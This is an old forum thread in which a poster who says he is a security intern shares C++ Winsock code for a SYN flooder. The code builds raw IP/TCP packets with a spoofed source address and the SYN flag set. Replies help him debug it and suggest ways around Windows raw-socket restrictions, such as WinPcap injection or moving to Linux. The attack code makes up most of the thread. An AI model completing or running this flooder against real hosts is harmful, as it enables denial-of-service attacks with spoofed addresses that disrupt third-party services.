Jump to content
  • Advertisement
Sign in to follow this  
luke2

Raw Sockets

This topic is 4008 days old which is more than the 365 day threshold we allow for new replies. Please post a new topic.

If you intended to correct an error in the post then please contact us.

Recommended Posts

Hello all, Recently, I've started interning with a security firm (this is meant more to teach me than much else), my first project was to make a 'syn flooder' (A DNS attack)... So I did some research and came up with two options: A: Send out TCP packets with false IP addresses and a SYN flag set B: Modify the NIDS code (basically 'root kit level patching') I went with A, so therefore I need Raw Sockets. Some more research revealed that "Raw TCP packets can't contain data" Not a problem, I think, since all I need is a header with a SYN flag and a fake IP address. (Btw, I found that semi quote from a source on Wikipedia). So I test my app with Ethereal, but nothing is sent out- at all! And my error checking doesn't reveal anything... So, I am doing this in C++ W/ Visual Studio 2005 standard, winsock2, on Vista. I have access to a virtual machine too. Also, I make sure that I'm running/debugging with administrator permissions. *Disclaimer* I am not trying to hack anyone or anything, but merely to learn about security wise programming *Disclaimer* Here is some of my code, I think my error might be in my flag setting routine, I've only set the SYN flag.
namespace SynAttacker
{
	char packetData[512]; //Max size of packet is 512 bytes
	int payloadSize = 256; 
	IPV4_HDR* ipHdr=NULL; 
	TCP_HDR* tcpHdr=NULL;
	SOCKADDR_IN dest; 
	hostent* hostEntity=NULL; 
	unsigned short src_port;
	unsigned short dest_port;
	char* src_ip;
	char* dest_ip;
}

void SynAttacker::setUpAddresses( unsigned short src_port, unsigned short dest_port, char* src_ip, char* dest_ip )
{
	if( (hostEntity=gethostbyname(dest_ip))==0 )
		printf( "Host unresolved" );
	dest.sin_family = AF_INET;
	dest.sin_port = htons( dest_port );
	memcpy( &dest.sin_addr.s_addr, hostEntity->h_addr, hostEntity->h_length );
	SynAttacker::src_port = src_port;
	SynAttacker::src_ip = src_ip;
	SynAttacker::dest_port = dest_port;
	SynAttacker::dest_ip = dest_ip;
}

SOCKET SynAttacker::generateAndSendPacket( SOCKET s )
{	
	/**
	A packet has TWO headers, first comes the IP portion, 
	then comes the TCP packet- since TCP is built 'on top of' 
	IP.  So I set up the IP data first, then I set up the TCP.
	*/ 

	ipHdr = (IPV4_HDR *)packetData;	//lets point to the ip header portion
	ipHdr->ip_version=4;		//The version of the IP that this packet is formed for
	ipHdr->ip_header_len=5;		//The length of the IP header, in 32 bit words (4 bytes)
	ipHdr->ip_tos    = 0;
	ipHdr->ip_total_length = htons ( sizeof(IPV4_HDR) + sizeof(TCP_HDR) );
	ipHdr->ip_id     = htons(2);
	ipHdr->ip_frag_offset = 0;
	ipHdr->ip_frag_offset1 = 0;
	ipHdr->ip_reserved_zero = 0;
	ipHdr->ip_dont_fragment = 1;
	ipHdr->ip_more_fragment = 0;
	ipHdr->ip_ttl    = 8;
	ipHdr->ip_protocol = IPPROTO_TCP;
	ipHdr->ip_srcaddr  = inet_addr(src_ip);
	ipHdr->ip_destaddr = inet_addr(inet_ntoa(dest.sin_addr));
	ipHdr->ip_checksum = 0;

	tcpHdr = (TCP_HDR *)&packetData[sizeof(IPV4_HDR)]; //get the pointer to the tcp header in the packet
	
	tcpHdr->source_port = htons(src_port);
	tcpHdr->dest_port = htons(dest_port);
	//FLAGS- Might this be the mistake?
	tcpHdr->cwr=0;
	tcpHdr->ecn=0;
	tcpHdr->urg=0;
	tcpHdr->ack=0;
	tcpHdr->psh=0;
	tcpHdr->rst=0;
	tcpHdr->syn=1;
	tcpHdr->fin=0;
	tcpHdr->ns=0;
	
	tcpHdr->checksum = 0;
    
	//Take the address where the packet's data starts.
	//void* dataPtr = &packetData[sizeof(IPV4_HDR) + sizeof(TCP_HDR)];
	//memset(dataPtr, '^', payloadSize);

	
	
	printf( "Bytes sent: %d", sendto( s, packetData, sizeof(IPV4_HDR)+sizeof(TCP_HDR) + payloadSize, 0, (SOCKADDR*)&dest, sizeof(dest) ) );
		
	return s;
}

Share this post


Link to post
Share on other sites
Advertisement
You don't show the bit of code that creates the socket.

Try out something like this example first:
http://tangentsoft.net/wskfaq/examples/rawping.html

If that doesn't work, my gut feeling would be that Vista has mucked things up. Make sure you're running the program as the real Administrator.

But for serious security analysis, I wouldn't rely on such operating system APIs. I believe WinPcap allows packet injection, somewhere in the NDIS IM level.

Quote:
I think my error might be in my flag setting routine, I've only set the SYN flag.

No, that's perfectly valid. IIRC, the standard TCP handshake is SYN, SYN|ACK, ACK.

Share this post


Link to post
Share on other sites
Well, I've compared my code to multiple versions on the internet, and they appear to be the same---


bool SynAttacker::initializeAttack()
{

WSADATA wsaData;
WORD version;
int error;

version = MAKEWORD( 2, 0 );

error = WSAStartup( version, &wsaData );

/* check for error */
if ( error != 0 )
{
/* error occured */
return FALSE;
}

/* check for correct version */
if ( LOBYTE( wsaData.wVersion ) != 2 ||
HIBYTE( wsaData.wVersion ) != 0 )
{
/* incorrect WinSock version */
WSACleanup();
return FALSE;
}

return TRUE;
}


//Creates a socket
SOCKET SynAttacker::getSocket( )
{
SOCKET s;
//Create Raw TCP Packet
printf("\nCreating Raw TCP Socket...");
if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW))==SOCKET_ERROR)
{
printf("Creation of raw socket failed.");
return 0;
}
printf("Raw TCP Socket Created successfully.");
////////////////////////////////////////////////
int optval=1;
//Put Socket in RAW Mode.
printf("\nSetting the socket in RAW mode...");
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&optval, sizeof(optval))==SOCKET_ERROR)
{
printf("failed to set socket in raw mode.");
return 0;
}
printf("Successful.");
return s;
}

Share this post


Link to post
Share on other sites
Yes, I run VS2005 in admin although I doubt that this transfers over to programs running under it's control, so I just compile and then navigate to the exe file w/ windows explorer and start it up with administrator rights.

Share this post


Link to post
Share on other sites
In Vista, there's a rather important difference between "administrator rights" and the actual Administrator account. Try running it as Administrator.

But then again...if that's the problem, I'd expect error codes.

Share this post


Link to post
Share on other sites
Hmmm... That seems interesting, but I have an empty partition (40gigs) on my hd so I was thinking of installing xp w/o any service packs-- do you think that would remove security restrictions?

Share this post


Link to post
Share on other sites
While it would remove security restrictions, it would also leave the (virtual) machine vulnerable to outside attack, as WinXP was really hole-y when released. A better approach might be to install a modern Linux falvor, which doesn't have the holes, and doesn't try to prevent you from sending raw TCP packets.

Share this post


Link to post
Share on other sites
Sign in to follow this  

  • Advertisement
×

Important Information

By using GameDev.net, you agree to our community Guidelines, Terms of Use, and Privacy Policy.

We are the game development community.

Whether you are an indie, hobbyist, AAA developer, or just trying to learn, GameDev.net is the place for you to learn, share, and connect with the games industry. Learn more About Us or sign up!

Sign me up!